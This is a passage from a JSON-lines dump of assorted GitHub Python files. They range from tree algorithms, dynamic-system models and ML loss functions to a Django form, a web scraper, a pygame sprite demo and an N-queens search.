main()\r\n","repo_name":"jean-charles-gibier/macgyver","sub_path":"macgyver.py","file_name":"macgyver.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38003879286","text":"# python 3\nfrom trees.tree_basics import Node\n\n\ndef build_tree(inorder, postorder, n):\n if not inorder:\n return\n\n root = Node(postorder[-1])\n index = inorder.index(root.data)\n\n new_inorder_left = inorder[:index]\n new_inorder_right = inorder[index + 1:]\n\n new_postorder_left = postorder[:index]\n new_postorder_right = postorder[index:len(postorder) - 1]\n\n root.left = build_tree(new_inorder_left, new_postorder_left, n)\n root.right = build_tree(new_inorder_right, new_postorder_right, n)\n\n return root\n\n\ndef main():\n inorder = [4, 8, 2, 5, 1, 6, 3, 7]\n postorder = [8, 4, 5, 2, 6, 7, 3, 1]\n build_tree(inorder, postorder, len(postorder))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HJ1X/dsa-450","sub_path":"trees/Construct tree/construct_tree_from_in_and_post_order.py","file_name":"construct_tree_from_in_and_post_order.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"25958911853","text":"\"\"\"Test HTTP capabilities of the core's frontend.\"\"\"\n\nfrom ppp_libmodule.tests import PPPTestCase\nfrom ppp_core import app\n\nclass HttpTest(PPPTestCase(app)):\n config_var = 'PPP_CORE_CONFIG'\n config = \"\"\"\n {\n \"debug\": true,\n \"modules\": []\n }\n \"\"\"\n def testPostOnly(self):\n self.assertEqual(self.app.get('/', status='*').status_int, 405)\n self.assertEqual(self.app.put('/', status='*').status_int, 405)\n def testNotRoot(self):\n self.assertEqual(self.app.post_json('/foo', {}, status='*').status_int, 400)\n def testNotJson(self):\n self.assertEqual(self.app.post('/', 'foobar', status='*').status_int, 400)\n def testWorking(self):\n q = {'id': '1', 'language': 'en', 'tree': {'type': 'triple',\n 'subject': {'type': 'resource', 'value': 'foo'},\n 'predicate': {'type': 'resource', 'value': 'bar'},\n 'object': {'type': 'resource', 'value': 'baz'}},\n 'measures': {}, 'trace': []}\n self.assertResponse(q, [])\n def testNoTree(self):\n q = {'language': 'en'}\n self.assertStatusInt(q, 400)\n","repo_name":"ProjetPP/PPP-Core","sub_path":"tests/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"673259033","text":"\"\"\"Example dynamic models.\"\"\"\n\nimport abc\nfrom typing import Callable, Tuple\n\nimport numpy as np\nfrom scipy import constants, integrate\n\n\nclass ContinuousDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Continuous-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement differential equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Time derivative of state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t: float, x: np.ndarray) -> np.ndarray:\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: np.ndarray,\n u: Callable[[float], np.ndarray],\n **kwargs,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model using numerical integration.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : Callable[[float], np.ndarray]\n Input function of time.\n **kwargs : dict\n Keyword arguments for :func:`integrate.solve_ivp`.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. Each timestep is one row.\n \"\"\"\n sol = integrate.solve_ivp(\n lambda t, x: self.f(t, x, u(t)),\n t_range,\n x0,\n t_eval=np.arange(*t_range, t_step),\n **kwargs,\n )\n return (sol.t, sol.y.T)\n\n\nclass DiscreteDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Discrete-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement next-state equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Next state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t, x):\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: np.ndarray,\n u: np.ndarray,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : np.ndarray\n Input array.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. Each timestep is one row.\n \"\"\"\n t = np.arange(*t_range, t_step)\n x = np.empty((t.shape[0], x0.shape[0]))\n x[0, :] = x0\n for k in range(1, t.shape[0]):\n x[k, :] = self.f(t[k - 1], x[k - 1, :], u[k - 1])\n return (t, x)\n\n\nclass MassSpringDamper(ContinuousDynamicModel):\n \"\"\"Mass-spring-damper model.\n\n State is ``[position, velocity]``.\n\n Examples\n --------\n Simulate a mass-spring-damper\n\n >>> msd = pykoop.dynamic_models.MassSpringDamper(0.5, 0.7, 0.6)\n >>> x0 = np.array([1, 0])\n >>> t, x = msd.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass: float, stiffness: float, damping: float) -> None:\n \"\"\"Instantiate :class:`MassSpringDamper`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n stiffness : float\n Stiffness (N/m).\n damping : float\n Viscous damping (N.s/m).\n \"\"\"\n self.mass = mass\n self.stiffness = stiffness\n self.damping = damping\n\n @property\n def A(self):\n \"\"\"Compute ``A`` matrix.\"\"\"\n A = np.array([\n [0, 1],\n [-self.stiffness / self.mass, -self.damping / self.mass],\n ])\n return A\n\n @property\n def B(self):\n \"\"\"Compute ``B`` matrix.\"\"\"\n B = np.array([\n [0],\n [1 / self.mass],\n ])\n return B\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = (self.A @ np.reshape(x, (-1, 1))\n + self.B @ np.reshape(u, (-1, 1)))\n return np.ravel(x_dot)\n\n\nclass Pendulum(ContinuousDynamicModel):\n \"\"\"Point-mass pendulum with optional damping.\n\n State is ``[angle, angular_velocity]``.\n\n Examples\n --------\n Simulate a pendulum\n\n >>> pend = pykoop.dynamic_models.Pendulum(0.5, 1, 0.6)\n >>> x0 = np.array([np.pi / 2, 0])\n >>> t, x = pend.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass, length, damping=0):\n \"\"\"Instantiate :class:`Pendulum`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n length : float\n Length (m).\n damping : float\n Viscous damping (N.m.s/rad).\n \"\"\"\n self.mass = mass\n self.length = length\n self.damping = damping\n\n def f(self, t, x, u):\n # noqa: D102\n theta, theta_dot = x\n x_dot = np.array([\n theta_dot,\n (-self.damping / self.mass / self.length**2 * theta_dot\n - constants.g / self.length * np.sin(theta)),\n ]) + np.array([\n 0,\n 1 / (self.mass * self.length**2),\n ]) * u\n return x_dot\n\n\nclass DuffingOscillator(ContinuousDynamicModel):\n r\"\"\"Duffing oscillator model.\n\n Equation is ``\\ddot{x} + \\delta \\dot{x} + \\beta x + \\alpha x^3 = u(t)``\n where usually ``u(t) = a \\cos(\\omega t)``.\n \"\"\"\n\n def __init__(\n self,\n alpha: float = 1,\n beta: float = -1,\n delta: float = 0.1,\n ) -> None:\n \"\"\"Instantiate :class:`DuffingOscillator`.\n\n Parameters\n ----------\n alpha : float\n Coefficient of cubic term.\n beta : float\n Coefficient of linear term.\n delta : float\n Coefficient of first derivative.\n \"\"\"\n self.alpha = alpha\n self.beta = beta\n self.delta = delta\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = np.array([\n x[1],\n u - self.delta * x[1] - self.beta * x[0] - self.alpha * x[0]**3\n ])\n return x_dot\n\n\nclass DiscreteVanDerPol(DiscreteDynamicModel):\n \"\"\"Van der Pol oscillator.\n\n Examples\n --------\n Simulate Van der Pol oscillator\n\n >>> t_step = 0.1\n >>> vdp = pykoop.dynamic_models.DiscreteVanDerPol(t_step, 2)\n >>> x0 = np.array([1, 0])\n >>> t_range = (0, 10)\n >>> u = 0.01 * np.cos(np.arange(*t_range, t_step))\n >>> t, x = vdp.simulate(t_range, t_step, x0, u)\n \"\"\"\n\n def __init__(self, t_step: float, mu: float) -> None:\n \"\"\"Instantiate :class:`DiscreteVanDerPol`.\n\n Parameters\n ----------\n t_step : float\n Timestep (s)\n mu : float\n Strength of nonlinearity.\n \"\"\"\n self.t_step = t_step\n self.mu = mu\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n # noqa: D102\n x_next = x + self.t_step * np.array(\n [x[1], self.mu * (1 - x[0]**2) * x[1] - x[0] + u])\n return x_next\n","repo_name":"decargroup/pykoop","sub_path":"pykoop/dynamic_models.py","file_name":"dynamic_models.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"3890310635","text":"import cv2\nimport mediapipe as mp\n\nmp_hand = mp.solutions.hands\nhands = mp_hand.Hands()\nmp_drawing_utils = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n success, img = cap.read()\n if not success:\n break\n result = hands.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n if result.multi_hand_landmarks:\n for hand_landmark in result.multi_hand_landmarks:\n mp_drawing_utils.draw_landmarks(\n img,\n hand_landmark,\n mp_hand.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style()\n )\n for id_landmark, landmark in enumerate(hand_landmark.landmark):\n print(id_landmark, landmark)\n if id_landmark == 0:\n h, w, c = img.shape\n print(h, w)\n cx_0, cy_0 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 1:\n h, w, c = img.shape\n cx_1, cy_1 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 9:\n h, w, c = img.shape\n cx_9, cy_9 = int(landmark.x * w), int(landmark.y * h)\n elif id_landmark == 17:\n h, w, c = img.shape\n cx_17, cy_17 = int(landmark.x * w), int(landmark.y * h)\n\n cv2.line(img, (cx_0, cy_0), (cx_9, cy_9), (255, 0, 0), 5)\n cv2.line(img, (cx_1, cy_1), (cx_17, cy_17), (255, 0, 0), 5)\n\n\n\n # print(result.multi_hand_landmarks)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"jsli96/ramp1.4_mega2560","sub_path":"haptic-device_mega2560/hand_rec_cv.py","file_name":"hand_rec_cv.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"86748210456","text":"import apache_beam as beam\nfrom apache_beam.options.pipeline_options import (PipelineOptions, SetupOptions) \nimport argparse\n\nOUTPUT_SCHEMA = \"bestdeviceid:STRING, bestdeviceidtype:STRING, offerlevel:INTEGER, score:FLOAT, timestamp:TIMESTAMP\" \n\nOFFERLEVELS = [645570,640602,652131,640737,643902,649216,31454,633602,622270,636785]\n\ndef map_to_dict(x):\n \"\"\n return {\n 'bestdeviceid':x['bestdeviceid'], \n 'bestdeviceidtype':x['bestdeviceidtype'],\n 'offerlevel': x['offerlevel'],\n 'score':x['score'],\n 'timestamp':x['timestamp']}\n\n\nclass ModelInference(beam.DoFn):\n\n def __init__(self, offerlevel_id):\n \n import datetime\n from google.cloud import storage\n import joblib\n \n self._dt = datetime\n \n self._offerlevel = offerlevel_id\n self._bucket = 'pjm-sklearn-models'\n self._filename = f\"ol{offerlevel_id}.joblib\"\n \n _bucket = storage.Client().get_bucket(self._bucket)\n _blob = _bucket.blob(self._filename)\n \n # download to local\n _blob.download_to_filename(self._filename)\n self.model = joblib.load(self._filename)\n\n\n def process(self, element):\n \n pred = self.model.predict_proba([element['visitdata']])[:,1]\n \n return [{\n 'bestdeviceid':element['bestdeviceid'],\n 'bestdeviceidtype':element['bestdeviceidtype'],\n 'offerlevel':int(self._offerlevel),\n 'score':pred[0],\n 'timestamp':self._dt.datetime.now().isoformat()\n }]\n\n\ndef run(argv=None, save_main_session=True):\n\n parser = argparse.ArgumentParser()\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n\n with beam.Pipeline(options=pipeline_options) as p:\n source_data = (p \n | 'QueryTable' >> beam.io.Read(\n beam.io.BigQuerySource(\n query=\"\"\"\n select *\n from [dst-mlpipes:pjm_visitdata_sample.universe]\n limit 1000000\n \"\"\")\n )\n )\n\n inferences = []\n for offerlevel in OFFERLEVELS:\n inferences.append(source_data \n | f'Perform Inference OL {offerlevel}' >> beam.ParDo(ModelInference(offerlevel)))\n\n outputs = (\n tuple(inferences)\n | 'Combine outputs' >> beam.Flatten()\n # | 'Map to necessary structure' >> beam.Map(map_to_dict)\n | 'Write' >> beam.io.WriteToBigQuery(\n table='scoring_output',\n dataset='pjm_visitdata_sample',\n project='dst-mlpipes',\n schema=OUTPUT_SCHEMA)\n )\n\nif __name__ == '__main__':\n run()","repo_name":"pmccarthy-dstillery/tfxtesting","sub_path":"dataflow_scoring/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2256081934","text":"import numpy as np\r\n\r\ndef global_connectivity(nb_neurons,probability):\r\n all_neurons_id = np.arange(0,nb_neurons)\r\n all_i = np.repeat(all_neurons_id,nb_neurons)\r\n all_j = np.tile(all_neurons_id,nb_neurons)\r\n chozen_connections = np.random.choice(np.arange(0,nb_neurons**2),int((nb_neurons**2)*probability),replace=False)\r\n i_connect = all_i[chozen_connections]\r\n j_connect = all_j[chozen_connections]\r\n return i_connect,j_connect\r\n\r\ndef strength_assembly(neuron_pool,i_connect,j_connect,prev_strengths,inside_strength):\r\n\r\n new_strengths = prev_strengths\r\n\r\n for i_id in range(len(i_connect)):\r\n i= i_connect[i_id]\r\n j=j_connect[i_id]\r\n if i in neuron_pool and j in neuron_pool:\r\n new_strengths[i_id] = inside_strength\r\n\r\n return new_strengths","repo_name":"Saighi/SelfHealingNetwork","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71703622763","text":"import torch\nimport torch.nn as nn\n\n\nclass CE:\n def __init__(self, model):\n self.model = model\n self.ce = nn.CrossEntropyLoss()\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n labels = labels.view(-1).long()\n loss = self.ce(outputs, labels)\n return loss\n\n\nclass BCE:\n def __init__(self, model):\n self.model = model\n self.bce = nn.BCELoss(reduction='none')\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n weight = torch.ones(outputs.shape[0]).float().to(outputs.device)\n loss = self.bce(outputs.view(-1), labels.float())\n loss = torch.mean(weight * loss)\n return loss\n","repo_name":"icantnamemyself/FormerTime","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"73950601002","text":"#coding=utf-8\n__author__ = 'xuxuan'\nclass Solution(object):\n _numsToRoman=[\n ['','I','II','III','IV','V','VI','VII','VIII','IX','X'],\n ['','X','XX','XXX','XL','L','LX','LXX','LXXX','XC','C'],\n ['','C','CC','CCC','CD','D','DC','DCC','DCCC','CM','M'],\n ['','M','MM','MMM'],\n ]\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n s='0'*(4-len(str(num)))+str(num)\n ntr=self._numsToRoman\n return ntr[3][int(s[0])]+ntr[2][int(s[1])]+ntr[1][int(s[2])]+ntr[0][int(s[3])]","repo_name":"corpsepiges/leetcode","sub_path":"python/012. Integer to Roman.py","file_name":"012. Integer to Roman.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"19"} +{"seq_id":"37336729604","text":"# ================= Atmospheric CO2 Emissions ===================\r\n\r\n#This program is to show the growth of CO2 Emissions since 1960, when the Mauna Loa records began being published.\r\n#The data has been retrieved and copied from the following website: https://climate.nasa.gov/vital-signs/carbon-dioxide/\r\n# where the data can be downloaded and viewed.\r\n#The objective of this is to show how polynomial regression can look in relation to linear regression.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\n# Training set\r\nx_line = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year.\r\ny_line = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Testing set\r\nx_poly = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year\r\ny_poly = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Train the Linear Regression model and plot a prediction\r\nregressor = LinearRegression()\r\nregressor.fit(x_line, y_line)\r\nxx = np.linspace(1950, 2020, 10)\r\nyy = regressor.predict(xx.reshape(xx.shape[0], 1))\r\nplt.plot(xx, yy)\r\n\r\n# Set the degree of the Polynomial Regression model\r\nquadratic_degree = PolynomialFeatures(degree=2)\r\n\r\n# This preprocessor transforms an input data matrix into a new data matrix of a given degree\r\nx_train_quadratic = quadratic_degree.fit_transform(x_line)\r\nx_test_quadratic = quadratic_degree.transform(x_poly)\r\n\r\n# Train and test the regressor_quadratic model\r\nregressor_quadratic = LinearRegression()\r\nregressor_quadratic.fit(x_train_quadratic, y_line)\r\nxx_quadratic = quadratic_degree.transform(xx.reshape(xx.shape[0], 1))\r\n\r\n# Plot the graph\r\nplt.plot(xx, regressor_quadratic.predict(xx_quadratic), c='r', linestyle='--')\r\nplt.title('Atmospheric Carbon Dioxide Emissions Over 60 Years')\r\nplt.xlabel('Year')\r\nplt.ylabel('CO2 Emissions in Parts Per Million(PPM)')\r\nplt.axis([1950, 2020, 310, 420])\r\nplt.grid(True)\r\nplt.scatter(x_line, y_line)\r\nplt.show()\r\nprint(x_line)\r\nprint(x_train_quadratic)\r\nprint(x_poly)\r\nprint(x_test_quadratic)\r\n\r\n# If you execute the code, you will see that the simple linear regression model is plotted with\r\n# a solid line. The quadratic regression model is plotted with a dashed line and evidently\r\n# the quadratic regression model fits the training data slightly better.\r\n","repo_name":"Bmk19/Atmospheric_CO2Emissions","sub_path":"AtmosphericCO2.py","file_name":"AtmosphericCO2.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71476930922","text":"# Chapter 7, programming exercise 3\n# This program calculates the corresponding \n# grade of an exam score. \n\ndef main():\n print(\"This program will calculate the corresponding grade of an exam score.\\n\")\n try:\n examScore = int(input(\"Enter your exam score: \"))\n except NameError:\n print(\"Please enter a valid number between 0 and 100.\")\n except TypeError:\n print(\"Please enter a valid number between 0 and 100.\")\n except ValueError:\n print(\"Please enter a valid number between 0 and 100.\") \n\n\n if 100 > examScore >= 90:\n grade = \"A\"\n elif 90 > examScore >= 80:\n grade = \"B\"\n elif 80 > examScore >= 70:\n grade = \"C\"\n elif 70 > examScore >= 60:\n grade = \"D\"\n elif 60 > examScore:\n grade = \"F\"\n else:\n print(\"Please enter a valid number between 0 and 100.\")\n \n\n print(\"The corresponding grade of your exam score is \", grade, \".\")\n\nif __name__ == '__main__':\n main()","repo_name":"dashaevsina/HW070172","sub_path":"L05/Chapter 7 Programming exercise 3).py","file_name":"Chapter 7 Programming exercise 3).py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2464169476","text":"from django.contrib.auth.forms import UserCreationForm\n\nfrom django.db import transaction\nfrom django import forms\nfrom .models import User,ReaderProfile,AuthorProfile\nchoise = ((\"READER\",\"Reader\"),(\"AUTHOR\",\"Author\"))\nclass SignupForm(UserCreationForm):\n role = forms.ChoiceField(choices=choise)\n class Meta(UserCreationForm.Meta):\n model = User\n fields = [\"username\",\"email\",\"role\"]\n \n @transaction.atomic\n def save(self):\n user = super().save(commit=False)\n user.role = self.cleaned_data.get('role')\n # if(\"READER\" in self.cleaned_data.get('role')):\n # user.role = (\"READER\",'Reader')\n # else:\n # user.role = (\"AUTHOR\",'Author')\n user.save()\n if(user.role == \"READER\"):\n reader = ReaderProfile.objects.create(user=user)\n reader.save()\n \n elif(user.role == \"AUTHOR\"):\n author = AuthorProfile.objects.create(user=user)\n author.save()\n return user\n","repo_name":"adel5555/libsys","sub_path":"user/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3771861795","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef melon():\n url = 'https://www.melon.com/chart/'\n header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'}\n result = requests.get(url, headers=header)\n soup = BeautifulSoup(result.text, 'html.parser')\n trs = soup.select('#lst50')\n line = []\n for tr in trs:\n rank = tr.select_one('.wrap.t_center').get_text().split('\\n')\n img= 'https:' + tr.select_one('td > div > a> img')['src']\n title = tr.select_one('.ellipsis.rank01>span>a').get_text().split('\\n')\n artist = tr.select_one('.ellipsis.rank02>span>a').get_text()\n song = tr.select_one('.ellipsis.rank03>a').get_text().split('\\n')\n line.append({'순위':rank,'albumImage':img, '곡명':title,'가수':artist,'앨범':song})\n\n return line","repo_name":"qomalq/DataAnalysis-Lecture","sub_path":"07.FlaskWeb/melon_unity.py","file_name":"melon_unity.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33737340135","text":"import pygame\r\nimport random\r\n\r\n# Color List\r\nBLACK = ( 0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\nclass Block(pygame.sprite.Sprite):\r\n \"\"\"\r\n Class for ball.\r\n Derives from the \"Sprite\" class in Pygame.\r\n \"\"\"\r\n\r\n def __init__(self, color, width, height):\r\n \"\"\" Constructor: pass in color and x/y position\r\n \"\"\"\r\n\r\n # Call the parent class\r\n super().__init__()\r\n\r\n # Create an image of the block and fill with a color\r\n # Can also be an image\r\n self.image = pygame.Surface([width, height])\r\n self.image.fill(color)\r\n\r\n # Fetch rect that has dimensions of the image\r\n\r\n # Update position of this object by setting values\r\n # of rect.x and rect.y\r\n self.rect = self.image.get_rect()\r\n\r\n def reset_pos(self):\r\n \"\"\" Reset position to the top of the screen at random x location.\r\n Called by update() or main program loop if collision.\r\n \"\"\"\r\n self.rect.y = random.randrange(-300, -20)\r\n self.rect.x = random.randrange(0, screen_width)\r\n\r\n def update(self):\r\n \"\"\" Called each frame.\"\"\"\r\n\r\n # Move block down one pixel\r\n self.rect.y += 1\r\n if self.rect.y > screen_height:\r\n self.reset_pos()\r\n\r\n# Initialize Pygame\r\npygame.init()\r\n\r\n# Set height and width of the screen\r\nscreen_width = 700\r\nscreen_height = 400\r\nscreen = pygame.display.set_mode([screen_width, screen_height])\r\n\r\n# List of Sprites.\r\n# Each block in program is added to this list.\r\n# List is managed by class called 'Group.'\r\nblock_list = pygame.sprite.Group()\r\n\r\n# This is a list of every sprite:\r\n# All blocks and the player block as well.\r\nall_sprites_list = pygame.sprite.Group()\r\n\r\nfor i in range(50):\r\n # This represents a block\r\n block = Block(BLACK, 20, 15)\r\n\r\n # Set a random location for the block\r\n block.rect.x = random.randrange(screen_width)\r\n block.rect.y = random.randrange(screen_height)\r\n\r\n # Add the block to the list of objects\r\n block_list.add(block)\r\n all_sprites_list.add(block)\r\n\r\n# Create a RED player block\r\nplayer = Block(RED, 20, 15)\r\nall_sprites_list.add(player)\r\n\r\n# Loop until user closes window\r\ndone = False\r\n\r\n# Manage how fast screen updates\r\nclock = pygame.time.Clock()\r\n\r\n# Hide mouse cursor\r\npygame.mouse.set_visible(0)\r\n\r\nscore = 0\r\n\r\n# -------- Main Program Loop ---------\r\nwhile not done:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n\r\n # Clear the screen\r\n screen.fill(WHITE)\r\n\r\n # Get current position of mouse\r\n pos = pygame.mouse.get_pos()\r\n\r\n # Fetch the x/y coordinates\r\n player.rect.x = pos[0]\r\n player.rect.y = pos[1]\r\n\r\n # Call update() method for all blocks in block_list\r\n block_list.update()\r\n\r\n # Check if player blocks has collided with other blocks\r\n blocks_hit_list = pygame.sprite.spritecollide(player, block_list, False)\r\n\r\n # Check the list of collisions\r\n for block in blocks_hit_list:\r\n score += 1\r\n print(score)\r\n\r\n block.reset_pos()\r\n if score == 100:\r\n print(\"C O N G R A T U L A T I O N S\")\r\n done = True\r\n\r\n # Draw all sprites\r\n all_sprites_list.draw(screen)\r\n\r\n # Limit to 60 frames per second\r\n clock.tick(60)\r\n\r\n # Update screen\r\n pygame.display.flip()\r\n\r\npygame.quit()","repo_name":"allenmattp/Arcade","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12207373683","text":"import random\nimport heapq\nimport sys\n\nsys.setrecursionlimit(10000)\n\n\nclass State:\n def __init__(self, queens, steps=0):\n self.queens = queens\n self.gn = steps\n\n def __lt__(self, other):\n return self.gn < other.gn\n\n def __hash__(self):\n return hash(tuple(self.queens))\n\n def __eq__(self, other):\n if isinstance(other, State):\n return self.queens == other.queens\n return False\n @staticmethod\n def random_state(n):\n if not isinstance(n, int):\n raise TypeError(\"n must be an integer\")\n queens = [random.randint(1, n) for _ in range(n)]\n return State(queens)\n\n def IsGoal(self):\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n return False\n return True\n\n def SuccessorFunction(self):\n states = set()\n n = len(self.queens)\n for i in range(n):\n for j in range(1, n + 1):\n if j != self.queens[i]:\n new_queens = list(self.queens)\n new_queens[i] = j\n successor_state = State(new_queens, self.gn + 1)\n states.add(successor_state)\n return list(states)\n\n def heuristic(self):\n attacks = 0\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n attacks += 1\n return attacks\n\n def cost(self):\n return self.gn\n\n\ndef BFS(initial_state):\n steps = 0\n FIFO = [(initial_state, 0)]\n visited = {initial_state}\n search_cost = 0\n max_fringe_size = 1\n\n while FIFO:\n state, steps = FIFO.pop(0)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n FIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(FIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef DFS(initial_state):\n LIFO = [(initial_state, 0)]\n visited = {initial_state}\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while LIFO:\n state, steps = LIFO.pop()\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n LIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(LIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef greedy(initial_state):\n heap = [(initial_state.heuristic(), initial_state)]\n visited = set()\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while heap:\n _, state = heapq.heappop(heap)\n visited.add(state)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited and successor_state not in [s for _, s in heap]:\n heapq.heappush(heap, (successor_state.heuristic(), successor_state))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(heap))\n\n steps += 